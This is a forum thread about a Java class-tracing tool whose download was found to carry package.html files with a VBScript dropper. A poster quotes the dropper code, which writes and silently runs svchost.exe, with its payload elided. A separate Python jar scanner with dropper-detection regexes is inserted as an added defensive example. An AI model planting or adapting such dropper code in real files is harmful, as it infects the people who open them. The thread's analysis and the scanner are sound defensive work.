Exetools

Exetools (https://forum.exetools.com/index.php)
-   Community Tools (https://forum.exetools.com/forumdisplay.php?f=47)
-   -   Tracer v2 (https://forum.exetools.com/showthread.php?t=18595)

CodeCracker 01-09-2018 23:19

Tracer v2
Java tracer, this time as a standalone jar.
Just select a jar and an output text file,
click Trace, and well, that's it!
Classes which start with "java." can't be logged!

Download link:
http://www18.zippyshare.com/v/qhcVnrK0/file.html

Kerlingen 01-11-2018 01:33

This file contains a VIRUS !!!

No, it's no false positive. There are at least seven HTML files "package.html" inside which contain JavaScript to drop a file called "svchost.exe"

cybercoder 01-11-2018 20:33

Yep, actually looks pretty dodgy; it seems to try and use VBScript to drop svchost.exe:

--<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = ......

Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
</SCRIPT>

Haven't actually checked out the file that is to be dropped yet.
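A small triage check for the kind of finding described above, written as an added example that is not part of this thread or of the Tracer tool: it builds a constructed jar in memory whose package.html carries the dropper's signature lines (no payload bytes), then flags every non-class entry that matches VBScript-dropper indicators.

```python
import io
import re
import zipfile

# Constructed sample: mimics the quoted package.html dropper skeleton
# (signature lines only, no WriteData payload).
SAMPLE_HTML = (
    '<html><body>package docs</body></html>\n'
    '<SCRIPT Language=VBScript><!--\n'
    'DropFileName = "svchost.exe"\n'
    'Set FSO = CreateObject("Scripting.FileSystemObject")\n'
    'Set WSHshell = CreateObject("WScript.Shell")\n'
    'WSHshell.Run DropPath, 0\n'
    '</SCRIPT>\n'
)

# Indicators of an embedded script dropper inside a jar's text entries.
INDICATORS = [
    re.compile(r"<script[^>]*language\s*=\s*['\"]?vbscript", re.I),
    re.compile(r"createobject\s*\(\s*['\"]wscript\.shell['\"]", re.I),
    re.compile(r"createobject\s*\(\s*['\"]scripting\.filesystemobject['\"]", re.I),
    re.compile(r"\.run\s+\w+\s*,\s*0\b", re.I),  # hidden-window execution
]

def build_sample_jar() -> bytes:
    """Constructed jar: manifest, a stub class, one bad and one clean package.html."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        jar.writestr("tracer/Main.class", b"\xca\xfe\xba\xbe")  # stub, not real bytecode
        jar.writestr("tracer/package.html", SAMPLE_HTML)
        jar.writestr("tracer/clean/package.html", "<html>just javadoc</html>")
    return buf.getvalue()

def scan_jar(data: bytes) -> dict:
    """Return {entry_name: [matched patterns]} for non-class entries with indicators."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as jar:
        for info in jar.infolist():
            if info.is_dir() or info.filename.endswith(".class"):
                continue
            text = jar.read(info).decode("utf-8", errors="replace")
            hits = [p.pattern for p in INDICATORS if p.search(text)]
            if hits:
                findings[info.filename] = hits
    return findings

if __name__ == "__main__":
    for name, hits in scan_jar(build_sample_jar()).items():
        print(f"{name}: {len(hits)} indicator(s)")
```

Run it against a real jar by passing the file's bytes to scan_jar; a hit on any entry is a reason to quarantine the archive before running it.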

Zeokat 01-15-2018 23:28

I read the same report at another forum and CodeCracker replied saying that it is a false positive. But... I still have my doubts :rolleyes:

CodeCracker 01-17-2018 04:58

False positive due to some HTML files present in the jar archive.
If you have already run the jar file, don't be alarmed, since the HTML files
are not executed, and not even used.
Htmls removed, check:
http://www18.zippyshare.com/v/qhcVnrK0/file.html

sendersu 01-17-2018 20:56

So who the hell added malware HTML into your archives, and why?

Kerlingen 01-18-2018 01:26

Quote:

Originally Posted by CodeCracker (Post 111917)
False positive

Please, read the definition before stating something obviously wrong:
Quote:

A false positive error, or in short a false positive, commonly called a "false alarm", is a result that indicates a given condition exists, when it does not.
The fact that the malware doesn't execute just by downloading doesn't make it a false positive.

Or would you call the Ebola virus a "false positive" just because it's contained inside a glass phial?

rooster1 07-17-2018 01:24

@CodeCracker can this be used for a jar file that is launched with an EXE file?

CodeCracker 07-17-2018 02:20

It can trace only jars
 
Quote:

Originally Posted by rooster1 (Post 114021)
@CodeCracker can this be used for a jar file that is launched with an EXE file?

No, it can trace only jars currently; the main reason is that it uses ObjectWeb ASM to inject trace commands into classes.
You could try JavaClassManager
https://forum.exetools.com/showthread.php?t=18592
to try to save loaded classes.
JavaClassManager can launch both jar and exe extensions;
it is just a matter of intercepting class loading and editing classes to do what you want.

rooster1 07-17-2018 03:53

Thanks for the guidance bro. I will try your recommendation :)
peace

